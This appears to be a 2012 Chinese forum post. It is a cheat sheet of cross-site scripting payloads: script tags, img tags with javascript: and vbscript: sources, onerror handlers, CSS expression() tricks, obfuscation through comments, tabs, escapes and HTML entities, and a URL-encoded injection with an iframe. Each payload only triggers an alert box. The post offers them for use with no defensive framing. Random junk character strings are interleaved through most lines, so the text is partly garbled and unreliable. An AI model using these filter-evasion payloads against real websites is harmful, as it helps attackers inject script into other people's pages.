<script>alert("跨站")</script> (最常用)
; U0 p: Z4 D7 r W1 l1 W' ~<img scr=javascript:alert("跨站")></img>0 F+ I! e% X! g( H( W4 J, q4 Y# S$ w
<img scr="javascript: alert(/跨站/)></img>
8 M( D) p* ]" X% K/ A<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 ^3 F6 A- {- e! J<img scr="#" onerror=alert(/跨站/)></img>
* J' ~9 G7 C* ]' r- {4 c% ~3 a<img scr="#" style="xss:expression(alert(/xss/));"></img>' V4 B4 e# _ y& j
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
7 A1 ^4 `7 L" s! E<img src=vbscript:msgbox ("xss")></img>/ P+ J9 E/ s; K8 z7 q# Q
<style> input {left:expression (alert('xss'))}</style>+ t' V) }9 k) n
<div style={left:expression (alert('xss'))}></div>$ h+ k5 ^' q# T
<div style={left:exp/* */ression (alert('xss'))}></div>
8 e* R# Y9 X' b3 p7 n# c& ~<div style={left:\0065\0078ression (alert('xss'))}></div>- d! z/ y$ F- \- p/ L
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 w3 u% ]) ~7 F! W. cunicode <div style="{left:expRessioN (alert('xss'))}">" G% c! X1 s( Y6 ?4 Q
3 e) D: V! Y* o5 d$ `2 g& Z
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
8 ^2 C! r, a) c |
发表于 2012-9-15 14:09:13
收藏
支持
反对